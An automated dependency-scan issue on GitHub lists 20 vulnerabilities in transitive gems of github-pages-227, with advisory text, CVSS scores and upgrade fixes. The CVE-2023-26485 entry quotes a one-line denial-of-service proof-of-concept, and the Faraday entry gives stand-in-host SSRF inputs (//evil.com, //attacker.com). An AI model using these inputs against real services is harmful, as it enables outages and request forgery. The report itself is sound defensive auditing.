Skip to content

github-pages-227.gem: 20 vulnerabilities (highest severity is: 7.5) #2

@mend-bolt-for-github

Description

@mend-bolt-for-github
Vulnerable Library - github-pages-227.gem

Path to dependency file: /Gemfile.lock

Path to vulnerable library: /home/wss-scanner/.gem/ruby/2.7.0/cache/activesupport-6.0.5.1.gem

Vulnerabilities

Vulnerability Severity CVSS Dependency Type Fixed in (github-pages version) Remediation Possible**
WS-2023-0095 High 7.5 commonmarker-0.23.5.gem Transitive N/A*
WS-2022-0320 High 7.5 commonmarker-0.23.5.gem Transitive N/A*
CVE-2026-35611 High 7.5 addressable-2.8.0.gem Transitive N/A*
CVE-2026-33176 High 7.5 activesupport-6.0.5.1.gem Transitive N/A*
CVE-2024-49761 High 7.5 rexml-3.2.5.gem Transitive N/A*
CVE-2023-22796 High 7.5 activesupport-6.0.5.1.gem Transitive N/A*
CVE-2024-43398 Medium 5.9 rexml-3.2.5.gem Transitive N/A*
CVE-2026-25765 Medium 5.8 faraday-2.5.2.gem Transitive N/A*
CVE-2023-38037 Medium 5.5 activesupport-6.0.5.1.gem Transitive N/A*
CVE-2026-33169 Medium 5.3 activesupport-6.0.5.1.gem Transitive N/A*
CVE-2024-41946 Medium 5.3 rexml-3.2.5.gem Transitive N/A*
CVE-2024-41123 Medium 5.3 rexml-3.2.5.gem Transitive N/A*
CVE-2024-35176 Medium 5.3 rexml-3.2.5.gem Transitive N/A*
CVE-2023-28120 Medium 5.3 activesupport-6.0.5.1.gem Transitive N/A*
CVE-2023-26485 Medium 5.3 commonmarker-0.23.5.gem Transitive N/A*
CVE-2023-24824 Medium 5.3 commonmarker-0.23.5.gem Transitive N/A*
CVE-2026-33170 Medium 4.3 activesupport-6.0.5.1.gem Transitive N/A*
CVE-2024-39908 Medium 4.3 rexml-3.2.5.gem Transitive N/A*
CVE-2023-22483 Low 3.5 commonmarker-0.23.5.gem Transitive N/A*
CVE-2026-33637 Low 0.0 faraday-2.5.2.gem Transitive N/A*

*For some transitive vulnerabilities, there is no version of direct dependency with a fix. Check the "Details" section below to see if there is a version of transitive dependency where vulnerability is fixed.

**In some cases, Remediation PR cannot be created automatically for a vulnerability despite the availability of remediation

Details

WS-2023-0095

Vulnerable Library - commonmarker-0.23.5.gem

A fast, safe, extensible parser for CommonMark. This wraps the official libcmark library.

Library home page: https://rubygems.org/gems/commonmarker-0.23.5.gem

Path to dependency file: /Gemfile.lock

Path to vulnerable library: /home/wss-scanner/.gem/ruby/2.7.0/cache/commonmarker-0.23.5.gem

Dependency Hierarchy:

  • github-pages-227.gem (Root Library)
    • jekyll-commonmark-ghpages-0.2.0.gem
      • commonmarker-0.23.5.gem (Vulnerable Library)

Found in base branch: master

Vulnerability Details

Impact Several quadratic complexity bugs in commonmarker's underlying ""cmark-gfm"" (https://github.com/github/cmark-gfm) library may lead to unbounded resource exhaustion and subsequent denial of service. The following vulnerabilities were addressed: * "CVE-2023-24824" (GHSA-66g8-4hjf-77xh) * "CVE-2023-26485" (GHSA-r8vr-c48j-fcc5) For more information, consult the release notes for version ""0.23.0.gfm.10"" (https://github.com/github/cmark-gfm/releases/tag/0.29.0.gfm.10) and ""0.23.0.gfm.11"" (https://github.com/github/cmark-gfm/releases/tag/0.29.0.gfm.11). Mitigation Users are advised to upgrade to commonmarker version ""0.23.9"" (https://rubygems.org/gems/commonmarker/versions/0.23.9).

Publish Date: 2026-05-15

URL: WS-2023-0095

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-48wp-p9qv-4j64

Release Date: 2024-12-04

Fix Resolution: commonmarker - 0.23.9

Step up your Open Source Security Game with Mend here

WS-2022-0320

Vulnerable Library - commonmarker-0.23.5.gem

A fast, safe, extensible parser for CommonMark. This wraps the official libcmark library.

Library home page: https://rubygems.org/gems/commonmarker-0.23.5.gem

Path to dependency file: /Gemfile.lock

Path to vulnerable library: /home/wss-scanner/.gem/ruby/2.7.0/cache/commonmarker-0.23.5.gem

Dependency Hierarchy:

  • github-pages-227.gem (Root Library)
    • jekyll-commonmark-ghpages-0.2.0.gem
      • commonmarker-0.23.5.gem (Vulnerable Library)

Found in base branch: master

Vulnerability Details

Impact CommonMarker uses "cmark-gfm" for rendering "Github Flavored Markdown" (https://github.github.com/gfm/). A polynomial time complexity issue in cmark-gfm's autolink extension may lead to unbounded resource exhaustion and subsequent denial of service. Patches This vulnerability has been patched in the following CommonMarker release: - v0.23.6 Workarounds Disable use of the autolink extension. References https://redirect.github.com/gjtorikian/commonmarker/pull/190 GHSA-cgh3-p57x-9q7q https://en.wikipedia.org/wiki/Time_complexity For more information If you have any questions or comments about this advisory: * Open an issue in "github/cmark-gfm" (https://github.com/github/cmark-gfm) Acknowledgements We would like to thank "Legit Security" (https://www.legitsecurity.com) for reporting this vulnerability.

Publish Date: 2026-05-15

URL: WS-2022-0320

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-4qw4-jpp4-8gvp

Release Date: 2024-12-02

Fix Resolution: commonmarker - 0.23.6

Step up your Open Source Security Game with Mend here

CVE-2026-35611

Vulnerable Library - addressable-2.8.0.gem

Addressable is an alternative implementation to the URI implementation that is part of Ruby's standard library. It is flexible, offers heuristic parsing, and additionally provides extensive support for IRIs and URI templates.

Library home page: https://rubygems.org/gems/addressable-2.8.0.gem

Path to dependency file: /Gemfile.lock

Path to vulnerable library: /home/wss-scanner/.gem/ruby/2.7.0/cache/addressable-2.8.0.gem

Dependency Hierarchy:

  • github-pages-227.gem (Root Library)
    • jekyll-theme-modernist-0.2.0.gem
      • jekyll-seo-tag-2.8.0.gem
        • jekyll-3.9.2.gem
          • addressable-2.8.0.gem (Vulnerable Library)

Found in base branch: master

Vulnerability Details

Addressable is an alternative implementation to the URI implementation that is part of Ruby's standard library. From 2.3.0 to before 2.9.0, within the URI template implementation in Addressable, two classes of URI template generate regular expressions vulnerable to catastrophic backtracking. Templates using the * (explode) modifier with any expansion operator (e.g., {foo*}, {+var*}, {#var*}, {/var*}, {.var*}, {;var*}, {?var*}, {&var*}) generate patterns with nested unbounded quantifiers that are O(2^n) when matched against a maliciously crafted URI. Templates using multiple variables with the + or # operators (e.g., {+v1,v2,v3}) generate patterns with O(n^k) complexity due to the comma separator being within the matched character class, causing ambiguous backtracking across k variables. When matched against a maliciously crafted URI, this can result in catastrophic backtracking and uncontrolled resource consumption, leading to denial of service. This vulnerability is fixed in 2.9.0.

Publish Date: 2026-04-07

URL: CVE-2026-35611

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Release Date: 2026-04-07

Fix Resolution: https://github.com/sporkmonger/addressable.git - addressable-2.9.0

Step up your Open Source Security Game with Mend here

CVE-2026-33176

Vulnerable Library - activesupport-6.0.5.1.gem

A toolkit of support libraries and Ruby core extensions extracted from the Rails framework. Rich support for multibyte strings, internationalization, time zones, and testing.

Library home page: https://rubygems.org/gems/activesupport-6.0.5.1.gem

Path to dependency file: /Gemfile.lock

Path to vulnerable library: /home/wss-scanner/.gem/ruby/2.7.0/cache/activesupport-6.0.5.1.gem

Dependency Hierarchy:

  • github-pages-227.gem (Root Library)
    • jekyll-mentions-1.6.0.gem
      • html-pipeline-2.14.2.gem
        • activesupport-6.0.5.1.gem (Vulnerable Library)

Found in base branch: master

Vulnerability Details

Active Support is a toolkit of support libraries and Ruby core extensions extracted from the Rails framework. Prior to versions 8.1.2.1, 8.0.4.1, and 7.2.3.1, Active Support number helpers accept strings containing scientific notation (e.g. "1e10000"), which "BigDecimal" expands into extremely large decimal representations. This can cause excessive memory allocation and CPU consumption when the expanded number is formatted, possibly resulting in a DoS vulnerability. Versions 8.1.2.1, 8.0.4.1, and 7.2.3.1 contain a patch.

Publish Date: 2026-03-23

URL: CVE-2026-33176

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Release Date: 2026-03-23

Fix Resolution: https://github.com/rails/rails.git - v8.0.5,https://github.com/rails/rails.git - v8.1.3,https://github.com/rails/rails.git - v8.0.4.1,https://github.com/rails/rails.git - v8.1.2.1,https://github.com/rails/rails.git - v7.2.3.1

Step up your Open Source Security Game with Mend here

CVE-2024-49761

Vulnerable Library - rexml-3.2.5.gem

An XML toolkit for Ruby

Library home page: https://rubygems.org/gems/rexml-3.2.5.gem

Path to dependency file: /Gemfile.lock

Path to vulnerable library: /home/wss-scanner/.gem/ruby/2.7.0/cache/rexml-3.2.5.gem

Dependency Hierarchy:

  • github-pages-227.gem (Root Library)
    • jekyll-theme-modernist-0.2.0.gem
      • jekyll-seo-tag-2.8.0.gem
        • jekyll-3.9.2.gem
          • kramdown-2.3.2.gem
            • rexml-3.2.5.gem (Vulnerable Library)

Found in base branch: master

Vulnerability Details

REXML is an XML toolkit for Ruby. The REXML gem before 3.3.9 has a ReDoS vulnerability when it parses an XML that has many digits between &# and x...; in a hex numeric character reference (&#x...;). This does not happen with Ruby 3.2 or later. Ruby 3.1 is the only affected maintained Ruby. The REXML gem 3.3.9 or later include the patch to fix the vulnerability.

Publish Date: 2024-10-28

URL: CVE-2024-49761

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: https://www.cve.org/CVERecord?id=CVE-2024-49761

Release Date: 2024-10-28

Fix Resolution: rexml - 3.3.9

Step up your Open Source Security Game with Mend here

CVE-2023-22796

Vulnerable Library - activesupport-6.0.5.1.gem

A toolkit of support libraries and Ruby core extensions extracted from the Rails framework. Rich support for multibyte strings, internationalization, time zones, and testing.

Library home page: https://rubygems.org/gems/activesupport-6.0.5.1.gem

Path to dependency file: /Gemfile.lock

Path to vulnerable library: /home/wss-scanner/.gem/ruby/2.7.0/cache/activesupport-6.0.5.1.gem

Dependency Hierarchy:

  • github-pages-227.gem (Root Library)
    • jekyll-mentions-1.6.0.gem
      • html-pipeline-2.14.2.gem
        • activesupport-6.0.5.1.gem (Vulnerable Library)

Found in base branch: master

Vulnerability Details

A regular expression based DoS vulnerability in Active Support <6.1.7.1 and <7.0.4.1. A specially crafted string passed to the underscore method can cause the regular expression engine to enter a state of catastrophic backtracking. This can cause the process to use large amounts of CPU and memory, leading to a possible DoS vulnerability.

Publish Date: 2023-02-09

URL: CVE-2023-22796

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-j6gc-792m-qgm2

Release Date: 2023-02-09

Fix Resolution: activesupport - 7.0.4.1,activesupport - 6.1.7.1

Step up your Open Source Security Game with Mend here

CVE-2024-43398

Vulnerable Library - rexml-3.2.5.gem

An XML toolkit for Ruby

Library home page: https://rubygems.org/gems/rexml-3.2.5.gem

Path to dependency file: /Gemfile.lock

Path to vulnerable library: /home/wss-scanner/.gem/ruby/2.7.0/cache/rexml-3.2.5.gem

Dependency Hierarchy:

  • github-pages-227.gem (Root Library)
    • jekyll-theme-modernist-0.2.0.gem
      • jekyll-seo-tag-2.8.0.gem
        • jekyll-3.9.2.gem
          • kramdown-2.3.2.gem
            • rexml-3.2.5.gem (Vulnerable Library)

Found in base branch: master

Vulnerability Details

REXML is an XML toolkit for Ruby. The REXML gem before 3.3.6 has a DoS vulnerability when it parses an XML that has many deep elements that have same local name attributes. If you need to parse untrusted XMLs with tree parser API like REXML::Document.new, you may be impacted to this vulnerability. If you use other parser APIs such as stream parser API and SAX2 parser API, this vulnerability is not affected. The REXML gem 3.3.6 or later include the patch to fix the vulnerability.

Publish Date: 2024-08-22

URL: CVE-2024-43398

CVSS 3 Score Details (5.9)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: High
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-vmwr-mc7x-5vc3

Release Date: 2024-08-22

Fix Resolution: rexml - 3.3.6

Step up your Open Source Security Game with Mend here

CVE-2026-25765

Vulnerable Library - faraday-2.5.2.gem

Library home page: https://rubygems.org/gems/faraday-2.5.2.gem

Path to dependency file: /Gemfile.lock

Path to vulnerable library: /home/wss-scanner/.gem/ruby/2.7.0/cache/faraday-2.5.2.gem

Dependency Hierarchy:

  • github-pages-227.gem (Root Library)
    • jekyll-gist-1.5.0.gem
      • octokit-4.25.1.gem
        • faraday-2.5.2.gem (Vulnerable Library)

Found in base branch: master

Vulnerability Details

Faraday is an HTTP client library abstraction layer that provides a common interface over many adapters. Prior to 2.14.1, Faraday's build_exclusive_url method (in lib/faraday/connection.rb) uses Ruby's URI#merge to combine the connection's base URL with a user-supplied path. Per RFC 3986, protocol-relative URLs (e.g. //evil.com/path) are treated as network-path references that override the base URL's host/authority component. This means that if any application passes user-controlled input to Faraday's get(), post(), build_url(), or other request methods, an attacker can supply a protocol-relative URL like //attacker.com/endpoint to redirect the request to an arbitrary host, enabling Server-Side Request Forgery (SSRF). This vulnerability is fixed in 2.14.1.

Publish Date: 2026-02-09

URL: CVE-2026-25765

CVSS 3 Score Details (5.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: None
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-33mh-2634-fwr2

Release Date: 2026-02-09

Fix Resolution: https://github.com/lostisland/faraday.git - v2.14.1,faraday - 2.14.1

Step up your Open Source Security Game with Mend here

CVE-2023-38037

Vulnerable Library - activesupport-6.0.5.1.gem

A toolkit of support libraries and Ruby core extensions extracted from the Rails framework. Rich support for multibyte strings, internationalization, time zones, and testing.

Library home page: https://rubygems.org/gems/activesupport-6.0.5.1.gem

Path to dependency file: /Gemfile.lock

Path to vulnerable library: /home/wss-scanner/.gem/ruby/2.7.0/cache/activesupport-6.0.5.1.gem

Dependency Hierarchy:

  • github-pages-227.gem (Root Library)
    • jekyll-mentions-1.6.0.gem
      • html-pipeline-2.14.2.gem
        • activesupport-6.0.5.1.gem (Vulnerable Library)

Found in base branch: master

Vulnerability Details

ActiveSupport::EncryptedFile writes contents that will be encrypted to a temporary file. The temporary file's permissions are defaulted to the user's current "umask" settings, meaning that it's possible for other users on the same system to read the contents of the temporary file. Attackers that have access to the file system could possibly read the contents of this temporary file while a user is editing it. All users running an affected release should either upgrade or use one of the workarounds immediately.

Publish Date: 2025-01-09

URL: CVE-2023-38037

CVSS 3 Score Details (5.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Local
    • Attack Complexity: High
    • Privileges Required: Low
    • User Interaction: Required
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: Low
    • Availability Impact: Low

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-cr5q-6q9f-rq6q

Release Date: 2025-01-09

Fix Resolution: activesupport - 6.1.7.5,activesupport - 7.0.7.1

Step up your Open Source Security Game with Mend here

CVE-2026-33169

Vulnerable Library - activesupport-6.0.5.1.gem

A toolkit of support libraries and Ruby core extensions extracted from the Rails framework. Rich support for multibyte strings, internationalization, time zones, and testing.

Library home page: https://rubygems.org/gems/activesupport-6.0.5.1.gem

Path to dependency file: /Gemfile.lock

Path to vulnerable library: /home/wss-scanner/.gem/ruby/2.7.0/cache/activesupport-6.0.5.1.gem

Dependency Hierarchy:

  • github-pages-227.gem (Root Library)
    • jekyll-mentions-1.6.0.gem
      • html-pipeline-2.14.2.gem
        • activesupport-6.0.5.1.gem (Vulnerable Library)

Found in base branch: master

Vulnerability Details

Active Support is a toolkit of support libraries and Ruby core extensions extracted from the Rails framework. "NumberToDelimitedConverter" uses a lookahead-based regular expression with "gsub!" to insert thousands delimiters. Prior to versions 8.1.2.1, 8.0.4.1, and 7.2.3.1, the interaction between the repeated lookahead group and "gsub!" can produce quadratic time complexity on long digit strings. Versions 8.1.2.1, 8.0.4.1, and 7.2.3.1 contain a patch.

Publish Date: 2026-03-23

URL: CVE-2026-33169

CVSS 3 Score Details (5.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: Low

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Release Date: 2026-03-23

Fix Resolution: https://github.com/rails/rails.git - v8.0.4.1,https://github.com/rails/rails.git - v8.1.2.1,https://github.com/rails/rails.git - v7.2.3.1

Step up your Open Source Security Game with Mend here

CVE-2024-41946

Vulnerable Library - rexml-3.2.5.gem

An XML toolkit for Ruby

Library home page: https://rubygems.org/gems/rexml-3.2.5.gem

Path to dependency file: /Gemfile.lock

Path to vulnerable library: /home/wss-scanner/.gem/ruby/2.7.0/cache/rexml-3.2.5.gem

Dependency Hierarchy:

  • github-pages-227.gem (Root Library)
    • jekyll-theme-modernist-0.2.0.gem
      • jekyll-seo-tag-2.8.0.gem
        • jekyll-3.9.2.gem
          • kramdown-2.3.2.gem
            • rexml-3.2.5.gem (Vulnerable Library)

Found in base branch: master

Vulnerability Details

REXML is an XML toolkit for Ruby. The REXML gem 3.3.2 has a DoS vulnerability when it parses an XML that has many entity expansions with SAX2 or pull parser API. The REXML gem 3.3.3 or later include the patch to fix the vulnerability.

Publish Date: 2024-08-01

URL: CVE-2024-41946

CVSS 3 Score Details (5.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: Low

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-5866-49gr-22v4

Release Date: 2024-08-01

Fix Resolution: rexml - 3.3.3

Step up your Open Source Security Game with Mend here

CVE-2024-41123

Vulnerable Library - rexml-3.2.5.gem

An XML toolkit for Ruby

Library home page: https://rubygems.org/gems/rexml-3.2.5.gem

Path to dependency file: /Gemfile.lock

Path to vulnerable library: /home/wss-scanner/.gem/ruby/2.7.0/cache/rexml-3.2.5.gem

Dependency Hierarchy:

  • github-pages-227.gem (Root Library)
    • jekyll-theme-modernist-0.2.0.gem
      • jekyll-seo-tag-2.8.0.gem
        • jekyll-3.9.2.gem
          • kramdown-2.3.2.gem
            • rexml-3.2.5.gem (Vulnerable Library)

Found in base branch: master

Vulnerability Details

REXML is an XML toolkit for Ruby. The REXML gem before 3.3.2 has some DoS vulnerabilities when it parses an XML that has many specific characters such as whitespace character, >] and ]>. The REXML gem 3.3.3 or later include the patches to fix these vulnerabilities.

Publish Date: 2024-08-01

URL: CVE-2024-41123

CVSS 3 Score Details (5.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: Low

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-r55c-59qm-vjw6

Release Date: 2024-08-01

Fix Resolution: rexml - 3.3.3

Step up your Open Source Security Game with Mend here

CVE-2024-35176

Vulnerable Library - rexml-3.2.5.gem

An XML toolkit for Ruby

Library home page: https://rubygems.org/gems/rexml-3.2.5.gem

Path to dependency file: /Gemfile.lock

Path to vulnerable library: /home/wss-scanner/.gem/ruby/2.7.0/cache/rexml-3.2.5.gem

Dependency Hierarchy:

  • github-pages-227.gem (Root Library)
    • jekyll-theme-modernist-0.2.0.gem
      • jekyll-seo-tag-2.8.0.gem
        • jekyll-3.9.2.gem
          • kramdown-2.3.2.gem
            • rexml-3.2.5.gem (Vulnerable Library)

Found in base branch: master

Vulnerability Details

REXML is an XML toolkit for Ruby. The REXML gem before 3.2.6 has a denial of service vulnerability when it parses an XML that has many "<"s in an attribute value. Those who need to parse untrusted XMLs may be impacted to this vulnerability. The REXML gem 3.2.7 or later include the patch to fix this vulnerability. As a workaround, don't parse untrusted XMLs.

Publish Date: 2024-05-16

URL: CVE-2024-35176

CVSS 3 Score Details (5.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: Low

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-vg3r-rm7w-2xgh

Release Date: 2024-05-16

Fix Resolution: rexml - 3.2.7

Step up your Open Source Security Game with Mend here

CVE-2023-28120

Vulnerable Library - activesupport-6.0.5.1.gem

A toolkit of support libraries and Ruby core extensions extracted from the Rails framework. Rich support for multibyte strings, internationalization, time zones, and testing.

Library home page: https://rubygems.org/gems/activesupport-6.0.5.1.gem

Path to dependency file: /Gemfile.lock

Path to vulnerable library: /home/wss-scanner/.gem/ruby/2.7.0/cache/activesupport-6.0.5.1.gem

Dependency Hierarchy:

  • github-pages-227.gem (Root Library)
    • jekyll-mentions-1.6.0.gem
      • html-pipeline-2.14.2.gem
        • activesupport-6.0.5.1.gem (Vulnerable Library)

Found in base branch: master

Vulnerability Details

There is a vulnerability in ActiveSupport if the new bytesplice method is called on a SafeBuffer with untrusted user input.

Publish Date: 2025-01-09

URL: CVE-2023-28120

CVSS 3 Score Details (5.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: Low
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-pj73-v5mw-pm9j

Release Date: 2025-01-09

Fix Resolution: activesupport - 6.1.7.3,activesupport - 7.0.4.3

Step up your Open Source Security Game with Mend here

CVE-2023-26485

Vulnerable Library - commonmarker-0.23.5.gem

A fast, safe, extensible parser for CommonMark. This wraps the official libcmark library.

Library home page: https://rubygems.org/gems/commonmarker-0.23.5.gem

Path to dependency file: /Gemfile.lock

Path to vulnerable library: /home/wss-scanner/.gem/ruby/2.7.0/cache/commonmarker-0.23.5.gem

Dependency Hierarchy:

  • github-pages-227.gem (Root Library)
    • jekyll-commonmark-ghpages-0.2.0.gem
      • commonmarker-0.23.5.gem (Vulnerable Library)

Found in base branch: master

Vulnerability Details

cmark-gfm is GitHub's fork of cmark, a CommonMark parsing and rendering library and program in C. A polynomial time complexity issue in cmark-gfm may lead to unbounded resource exhaustion and subsequent denial of service. This CVE covers quadratic complexity issues when parsing text which leads with either large numbers of _ characters. This issue has been addressed in version 0.29.0.gfm.10. Users are advised to upgrade. Users unable to upgrade should validate that their input comes from trusted sources. ### Impact A polynomial time complexity issue in cmark-gfm may lead to unbounded resource exhaustion and subsequent denial of service. ### Proof of concept $ ~/cmark-gfm$ python3 -c 'pad = "_" * 100000; print(pad + "." + pad, end="")' | time ./build/src/cmark-gfm --to plaintext Increasing the number 10000 in the above commands causes the running time to increase quadratically. ### Patches This vulnerability have been patched in 0.29.0.gfm.10. ### Note on cmark and cmark-gfm XXX: TBD cmark-gfm is a fork of cmark that adds the GitHub Flavored Markdown extensions. The two codebases have diverged over time, but share a common core. These bugs affect both cmark and cmark-gfm. ### Credit We would like to thank @⁠gravypod for reporting this vulnerability. ### References https://en.wikipedia.org/wiki/Time_complexity ### For more information If you have any questions or comments about this advisory: * Open an issue in github/cmark-gfm
Mend Note: The description of this vulnerability differs from MITRE.

Publish Date: 2023-03-31

URL: CVE-2023-26485

CVSS 3 Score Details (5.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: Low

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: https://osv.dev/vulnerability/RSEC-2023-8

Release Date: 2023-03-31

Fix Resolution: commonmark - 1.9.2

Step up your Open Source Security Game with Mend here

CVE-2023-24824

Vulnerable Library - commonmarker-0.23.5.gem

A fast, safe, extensible parser for CommonMark. This wraps the official libcmark library.

Library home page: https://rubygems.org/gems/commonmarker-0.23.5.gem

Path to dependency file: /Gemfile.lock

Path to vulnerable library: /home/wss-scanner/.gem/ruby/2.7.0/cache/commonmarker-0.23.5.gem

Dependency Hierarchy:

  • github-pages-227.gem (Root Library)
    • jekyll-commonmark-ghpages-0.2.0.gem
      • commonmarker-0.23.5.gem (Vulnerable Library)

Found in base branch: master

Vulnerability Details

cmark-gfm is GitHub's fork of cmark, a CommonMark parsing and rendering library and program in C. A polynomial time complexity issue in cmark-gfm may lead to unbounded resource exhaustion and subsequent denial of service. This CVE covers quadratic complexity issues when parsing text which leads with either large numbers of > or - characters. This issue has been addressed in version 0.29.0.gfm.10. Users are advised to upgrade. Users unable to upgrade should validate that their input comes from trusted sources.

Publish Date: 2023-03-31

URL: CVE-2023-24824

CVSS 3 Score Details (5.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: Low

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: https://osv.dev/vulnerability/RSEC-2023-8

Release Date: 2023-03-31

Fix Resolution: commonmark - 1.9.2

Step up your Open Source Security Game with Mend here

CVE-2026-33170

Vulnerable Library - activesupport-6.0.5.1.gem

A toolkit of support libraries and Ruby core extensions extracted from the Rails framework. Rich support for multibyte strings, internationalization, time zones, and testing.

Library home page: https://rubygems.org/gems/activesupport-6.0.5.1.gem

Path to dependency file: /Gemfile.lock

Path to vulnerable library: /home/wss-scanner/.gem/ruby/2.7.0/cache/activesupport-6.0.5.1.gem

Dependency Hierarchy:

  • github-pages-227.gem (Root Library)
    • jekyll-mentions-1.6.0.gem
      • html-pipeline-2.14.2.gem
        • activesupport-6.0.5.1.gem (Vulnerable Library)

Found in base branch: master

Vulnerability Details

Active Support is a toolkit of support libraries and Ruby core extensions extracted from the Rails framework. Prior to versions 8.1.2.1, 8.0.4.1, and 7.2.3.1, "SafeBuffer#%" does not propagate the "@⁠html_unsafe" flag to the newly created buffer. If a "SafeBuffer" is mutated in place (e.g. via "gsub!") and then formatted with "%" using untrusted arguments, the result incorrectly reports "html_safe? == true", bypassing ERB auto-escaping and possibly leading to XSS. Versions 8.1.2.1, 8.0.4.1, and 7.2.3.1 contain a patch.

Publish Date: 2026-03-23

URL: CVE-2026-33170

CVSS 3 Score Details (4.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: Low
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Release Date: 2026-03-23

Fix Resolution: https://github.com/rails/rails.git - v8.0.4.1,https://github.com/rails/rails.git - v7.2.3.1,https://github.com/rails/rails.git - v8.1.2.1,https://github.com/rails/rails.git - v8.1.3,https://github.com/rails/rails.git - v8.0.5

